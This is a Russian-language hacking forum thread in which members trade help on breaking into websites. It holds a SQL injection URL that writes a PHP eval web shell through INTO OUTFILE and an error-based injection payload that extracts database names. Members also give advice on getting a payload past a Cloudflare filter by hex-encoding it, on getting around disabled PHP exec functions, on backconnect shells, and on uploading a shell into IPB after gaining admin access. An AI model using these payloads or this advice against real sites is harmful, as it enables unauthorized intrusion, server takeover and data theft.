Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. sysjuk

    sysjuk Member

    Joined:
    5 Jan 2012
    Messages:
    230
    Likes Received:
    58
    Reputations:
    5
    Назрел тут вопрос по sql injection, ns clounfire, пытаюсь выполнить такой запрос но безрезультатно.
    https://site.net/index.php'+and+(SeLeCt '<?php eval(base64_decode($_REQUEST[cmd])); ?>' InTo OuTfIlE '/home/site/public_html/site.net/tester.php')
    Не дает выполнить из-за <? если пишу select тоже не выполнятся, написал SeLeCt выполнился, но шелл не заливается, полный путь указан верно. Есть какие мысли?
     
  2. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    попробуйте всю строку с php кодом в hex
     
    _________________________
  3. sysjuk

    sysjuk Member

    Joined:
    5 Jan 2012
    Messages:
    230
    Likes Received:
    58
    Reputations:
    5
    Disabled PHP Functions: exec,ini_get_all,parse_ini_file,passthru,php_uname,popen,proc_open,shell_exec,show_source,system
    как нибудь можно обойти эти ограничения?
     
  4. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    смотря, что вам нужно
     
    _________________________
  5. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    Если экранируется <? то нихера не выйдет
     
  6. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    почему?
     
    _________________________
  7. 5maks5

    5maks5 Elder - Старейшина

    Joined:
    29 Aug 2010
    Messages:
    451
    Likes Received:
    264
    Reputations:
    40
    Банально - запилить бэкконект. :eek:
     
  8. sysjuk

    sysjuk Member

    Joined:
    5 Jan 2012
    Messages:
    230
    Likes Received:
    58
    Reputations:
    5
    бэкконект не работает в этом все и дело.
     
  9. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    281
    Likes Received:
    55
    Reputations:
    20
    Не могу залиться в IPB 1.3. Доступ админа есть.
    Пробовал через смайлы - не получилось.
    Пробовал sql запросом - нет прав на запись.

    Какие еще способы есть ?
     
  10. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    Не могу разобраться с sql инъекцией. Когда использую order byб подобралб все хорошо, страница отображается. Когда начинаю использовать union select то страница не отображается. Пробивал /*!union*/ не помогает, может подскажите что делать, пожалуйста?
     
  11. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    281
    Likes Received:
    55
    Reputations:
    20
    попробуй так
    Code:
    ' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
     
  12. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    спасибо, но так тоже не работает
     
  13. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Попробуй сделать запрос без union либо без select , если отобразится страница, то пробуй обойти фильтр.
     
    _________________________
  14. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    ага, понял. Буду пробовать, спасибо
     
  15. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    возможно, что там два последовательных запроса. возможно, что это не mysql
     
    _________________________
  16. sysjuk

    sysjuk Member

    Joined:
    5 Jan 2012
    Messages:
    230
    Likes Received:
    58
    Reputations:
    5
    Есть вопрос, возможно ли через MySql LOAD FILE посмотреть список файлов в директории?
     
  17. gromoza

    gromoza Member

    Joined:
    21 Dec 2008
    Messages:
    7
    Likes Received:
    6
    Reputations:
    0
    Если ОС сервера FreeBSD.
     
  18. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    думаю если есть права на LOAD_FILE, залей шелл, дальше по анологии
     
  19. sysjuk

    sysjuk Member

    Joined:
    5 Jan 2012
    Messages:
    230
    Likes Received:
    58
    Reputations:
    5
    Беда, с Linux 2.6.32-042stab094.8 #1 SMP Tue Dec 16 20:36:56 MSK 2014 i686 мб еще какие нибудь варианты есть? Файлы то читаются нормально, но нужно знать полный список файлов в каталоге.
    Шелл залит, но права нищенские все функции в Disabled.
    бэкконект не катит тоже.
     
  20. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Используйте обычные функции пхп, для просмотра и редактирования файлов и папок
     
    _________________________
Thread Status:
Not open for further replies.